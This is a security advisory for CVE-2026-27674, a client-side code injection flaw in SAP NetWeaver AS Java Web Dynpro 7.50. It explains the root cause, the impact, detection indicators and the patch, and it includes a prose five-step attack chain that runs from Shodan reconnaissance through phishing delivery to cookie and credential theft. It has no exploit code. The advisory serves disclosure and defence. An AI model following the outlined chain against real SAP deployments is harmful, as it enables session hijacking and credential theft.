CVE-2026-27674: 
SAP NetWeaver Application Server Java Análise e mitigação de vulnerabilidades

CVE-2026-27674 is a Code Injection vulnerability (CWE-94) in SAP NetWeaver Application Server Java, specifically the Web Dynpro Java component, that allows unauthenticated attackers to supply crafted input causing the application to reference attacker-controlled content. If a victim accesses the affected functionality, the attacker-controlled content can execute arbitrary client-side code in the victim's browser, potentially resulting in session compromise. The vulnerability affects SAP NetWeaver AS Java version 7.50 (WD-RUNTIME 7.50). It was published on April 14, 2026, and carries a CVSS v3.1 base score of 6.1 (Medium) (Github Advisory, SAP Security Notes).

The root cause is improper control of code generation (CWE-94), where the Web Dynpro Java component fails to neutralize or correctly sanitize externally-supplied input before it is interpreted by the application. An unauthenticated, network-based attacker can craft malicious input that causes the application to reference attacker-controlled content; when a victim user accesses the affected functionality, that content executes in their browser context — a behavior consistent with reflected cross-site scripting or client-side code injection. Exploitation requires user interaction (a victim must access the affected functionality), but no authentication or special privileges are needed on the attacker's side. The scope change in the CVSS vector indicates that the impact extends beyond the vulnerable component itself to the victim's browser session (Github Advisory, SAP Security Notes).

Successful exploitation allows an attacker to execute arbitrary client-side code in a victim's browser, potentially leading to session compromise, theft of session tokens or credentials, and unauthorized modification of application behavior as seen by the victim. The vulnerability impacts confidentiality and integrity at a low level (per CVSS), with no impact to availability. Because the scope is changed, the impact extends beyond the SAP NetWeaver AS Java component itself to the victim's browser environment, enabling data theft or manipulation of application interactions (Github Advisory).

1. Reconnaissance: Identify internet-facing SAP NetWeaver Application Server Java instances running version 7.50, using tools such as Shodan or Censys to locate exposed SAP Web Dynpro Java endpoints.
2. Craft malicious input: Construct a crafted URL or request targeting the vulnerable Web Dynpro Java functionality that embeds attacker-controlled content (e.g., a malicious script reference) in an input parameter that is insufficiently sanitized.
3. Deliver the payload: Distribute the crafted URL to a target victim via phishing email, social engineering, or by embedding it in a web page — since user interaction is required for exploitation.
4. Victim accesses the link: When the victim clicks the link and accesses the affected SAP Web Dynpro Java functionality, the application interprets the attacker-controlled input and causes the malicious content to execute in the victim's browser.
5. Achieve objective: The executed client-side code can steal session cookies, capture credentials, perform actions on behalf of the victim within the SAP application, or redirect the victim to further malicious infrastructure (Github Advisory).

• Network: Unusual or unexpected HTTP requests to SAP Web Dynpro Java endpoints containing encoded or obfuscated script content in URL parameters; outbound connections from victim browsers to unknown external domains following SAP Web Dynpro page loads.
• Logs: SAP NetWeaver AS Java access logs showing requests with suspicious parameter values containing script tags, JavaScript URIs, or references to external domains; repeated requests to Web Dynpro endpoints from unfamiliar source IPs.
• Application: Unexpected session invalidations or concurrent sessions for the same user account; user-reported anomalous browser behavior (redirects, pop-ups) when accessing SAP Web Dynpro functionality.

SAP addressed this vulnerability as part of the April 2026 SAP Security Patch Day; organizations should apply SAP Security Note 3719397, which contains the official patch for SAP NetWeaver AS Java (Web Dynpro Java) version 7.50 (SAP Security Notes, Github Advisory). As interim mitigations, organizations should restrict access to Web Dynpro Java functionality to trusted users and networks where operationally feasible, implement input validation and output encoding controls at the application or WAF layer, and educate users about phishing attacks that could be used to deliver malicious URLs targeting this vulnerability (Onapsis Blog).

The vulnerability was covered as part of broader SAP April 2026 Patch Day reporting by several security outlets. Onapsis published an analysis of the April 2026 SAP Security Notes, and SecurityBridge covered the patch day as well (Onapsis Blog, SecurityBridge). GBHackers and SecurityOnline.info also reported on the broader SAP patch day, noting critical flaws addressed alongside this moderate-severity issue (GBHackers, SecurityOnline). No significant independent researcher commentary or social media discussion specific to CVE-2026-27674 has been observed.